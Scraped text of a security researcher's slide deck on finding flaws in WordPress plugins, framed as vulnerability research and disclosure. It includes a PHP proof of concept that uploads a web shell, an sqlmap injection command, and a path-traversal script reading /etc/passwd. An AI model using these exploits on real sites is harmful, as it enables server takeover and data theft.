Best Practices for WordPress
 
doing_it_right() with WordPress
doing_it_right() with WordPressdoing_it_right() with WordPress
doing_it_right() with WordPress
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentation
 

Dernier

Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprisepreethippts
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsSafe Software
 
Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Rob Geurden
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...Akihiro Suda
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfDrew Moseley
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringHironori Washizaki
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationBradBedford3
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfMarharyta Nedzelska
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxAndreas Kunz
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceBrainSell Technologies
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...OnePlan Solutions
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...confluent
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLionel Briand
 
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxReal-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxRTS corp
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odishasmiwainfosol
 

Dernier (20)

Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprise
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...Simplifying Microservices & Apps - The art of effortless development - Meetup...
Simplifying Microservices & Apps - The art of effortless development - Meetup...
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdf
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their Engineering
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion Application
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdf
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. Salesforce
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and Repair
 
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptxReal-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
Real-time Tracking and Monitoring with Cargo Cloud Solutions.pptx
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
 

Hacking Wordpress Plugins

  • 1. Hacking WordPress Plugins Larry W. Cashdollar 8/1/2015 v1.2
  • 2. What is WordPress • Content Management System (CMS) • 23% of all websites (3/23/15) • Plugins - add functionality • Plugins may be authored by anyone
  • 3. Why hack WordPress plugins? • #1 CMS by number and percentage • Poor security model • Lack of QA on 3rd party plugins • More fun than Ruby Gems
  • 4. Methodology • Large code footprint with plugins and themes • Prefer no authentication required to exploit* • Look for PHP code that might be exploitable • Search specific traits or patterns: – upload.php – download.php – proxy.php
  • 5. Requirements • Processes user input • Has reachable code, not just defining a class • Doesn’t check if accessed directly • Doesn’t require authentication • Doesn’t require WP API hooks*
  • 6. Vulnerabilities • LFI • RFI • RCE • Open Proxies • SQL Injection • XSS
  • 7. Plugin Code Criteria • Doesn’t have POST/GET/FILE/REQUEST PUNT • If (!defined(ABSPATH)) die; PUNT • If (!is_admin) die; PUNT • Function class() {}; PUNT • May have Injectable SELECT, INSERT, DELETE, UPDATE, etc.
  • 8. A Quick Look • Download a few random plugins • Examine files named upload.php or download.php • Found RFI in videowhisper-video-presentation • The code:
  • 9. 1 <?php 2 3 if ($_GET["room"]) $room=$_GET["room"]; 4 if ($_POST["room"]) $room=$_POST["room"]; 5 $filename=$_FILES['vw_file']['name']; 6 7 include_once("incsan.php"); 8 sanV($room); 9 if (!$room) exit; 10 sanV($filename); 11 if (!$filename) exit; 12 13 if (strstr($filename,'.php')) exit; 14 15 //do not allow uploads to other folders 16 if ( strstr($room,"/") || strstr($room,"..") ) exit; 17 if ( strstr($filename,"/") || strstr($filename,"..") ) exit; 18 19 $destination="uploads/".$room."/"; 20 if ($_GET["slides"]) $destination .= "slides/"; 21 22 $ext=strtolower(substr($filename,-4)); 23 $allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi ",".mpg",".ppt",".pps "); 24 25 if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); 26 ?>loadstatus=1
  • 10. Exploiting it • Upload .phtml .shtml • Execute as www-data user • Previously patched (I circumvented)* • Also present in videowhisper-video- conference-integration * Annoying but still fun
  • 11. Initial Progress • Downloaded 10 random plugins • Found RFI in two of them! • Plugins had ~ 5k downloads • Must be more vulnerabilities out there
  • 12. Automate? • Download lots of plugins • grep code for specific patterns? • Same idea as Ruby Gem research I did • Easy to test with PoC • More fun! • Maybe write code to flag high risk code?
  • 13. Code Ferret v1.0 Feature Doc • Supply list of .php files to examine • Check for user input • Ignore if author checks for ABSPATH etc.. • Look for SQL functions • Flag if use of WP API • Flag if include files
  • 14. Code Ferret v1.0 Design Doc • Look for specific functions and strings • Anything of interest added to link list • Link list stores line number and reason for flag • Dump output & statistics • ANSI COLOR!
  • 15. Semi Automatic • git pull https://plugins.svn.wordpress.org • Scraped Plugins off wordpress.org • Downloaded 36,000 plugins • About 20 GB of data • upload.php or download.php • Use Ferret v1.0 to quickly examine lots of files • Profit! Err get some CVEs
  • 17. Ferret First Run • wp-powerplaygallery v3.3 • Flagged for user input with no access controls • Accesses WordPress API calls • Loads WordPress functions via require_once() • Code examination turns up RFI and Blind SQLi!
  • 18. wp-powerplaygallery RFI Code 143: if (!empty($_FILES)) { 144: if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) { 145: die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}'); 146: } 147: 148: // Read binary input stream and append it to temp file 149: if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) { 150: die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); 151: } . 158: while ($buff = fread($in, 4096)) { 159: fwrite($out, $buff); 160: }
  • 19. wp-powerplaygallery SQLI code 131: $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."',' ".$_REQUEST['name']."',1,'','NULL')"; 133 : $wpdb->query($query);
  • 20. RFI Exploit Requirements • POST request • Variable albumid must point at existing album in database • File to upload must exist locally • Use c99 shell as our payload • file variable contains payload with local full path • name variable contains our filename
  • 21. PoC Exploit • <?php • /*Remote shell upload exploit for wp-powerplaygallery v3.3 */ • /*Larry W. Cashdollar @_larry0 • 6/27/2015 • albumid needs to be a numeric value matching an existing album number, 1 is probably a good start • but you can enumerate these by using curl, and looking for redirect 301 responses: • e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big • ->301 exists else 404 doesn't. • shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php • */ • • • $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php'; • $file_name_with_full_path = '/var/www/shell.php'; • • echo "POST to $target_url $file_name_with_full_path"; • $post = array('albumid'=>’1' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo "<hr>"; • echo $result; • echo "<hr>"; • ?>
  • 22. Blind SQLi Exploit • Sqlmap $ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp- powerplaygallery/upload.php --data "albumid=1” —dbms mysql –level 5 – risk 3
  • 23. Lazy Exploits • Started using php-cgi to test exploits • The script Poc.sh #!/bin/sh export GATEWAY_INTERFACE=CGI/1.1 export PATH_TRANSLATED=UserSettings.php export QUERY_STRING=network=../../../../../../../../etc/passwd export REDIRECT_STATUS=CGI export REQUEST_METHOD=GET php-cgi ./plugin/buddystream/extensions/default/templates/UserSettings.php $ ./Poc.sh
  • 24. Pitfalls of Exploitation • Exploitable code is a class and isn’t reachable* • Code uses WordPress functions or functions from other segments of code with no includes • Code is incomplete or just broken • Someone discovered it last year
  • 25. Fatal Errors • [Thu Aug 06 07:22:58 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function trailingslashit() in /usr/share/wordpress/wp-content/plugins/ckeditor-for-wordpress/ckeditor_class.php on line 27 • [Sun Aug 02 13:55:06 2015] [error] [client 192.168.0.2] PHP Fatal error: require_once(): Failed opening required '/etc/wordpress/wp-settings.php' (include_path='.:/usr/share/php:/usr/share/pear') in /etc/wordpress/config-www.vapidlabs.com.php on line 90 • [Sun Aug 02 19:28:11 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20 • [Sun Aug 02 19:28:24 2015] [error] [client 192.168.0.16] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20 • [Sun Aug 02 19:28:28 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
  • 26. Vulnerable and Broken • <?php • $uploaddir = 'uploads/'; This needs to be full path • $file = $uploaddir . basename($_FILES['uploadfile']['name']); • if (move_uploaded_file($_FILES['uploadfile']['tmp_name' ], $file)) { • echo "success"; • } else { • echo "error"; • } • ?>
  • 27. oddities • Return local IP address of server • Prints the FULL path of the webserver server • Plugin that downloads itself ?!
  • 28. Statistics • 20 CVEs • 26* Vulnerabilities found • 6 were previously discovered and not included* • All in all 32 Vulnerabilities discovered • Dozens of known exploitable vulnerabilities remain unpatched * I now google ‘<pluginname> vulnerability’ before bothering to document
  • 29. Improvements • Parse php scripts checking for reachable code • Use RIPS v1.0 (thanks Chad!) • Circle back and examine vulnerabilities that require login to WP for exploitation
  • 31. Who Am I • 15 years at Akamai Technologies • ​Hobbyist Vulnerability Researcher • ​75+ CVEs • ​Formerly Unix Systems Administrator 17 years • ​Penetration Tester Back in Late 90s • Enjoy Writing and Breaking Code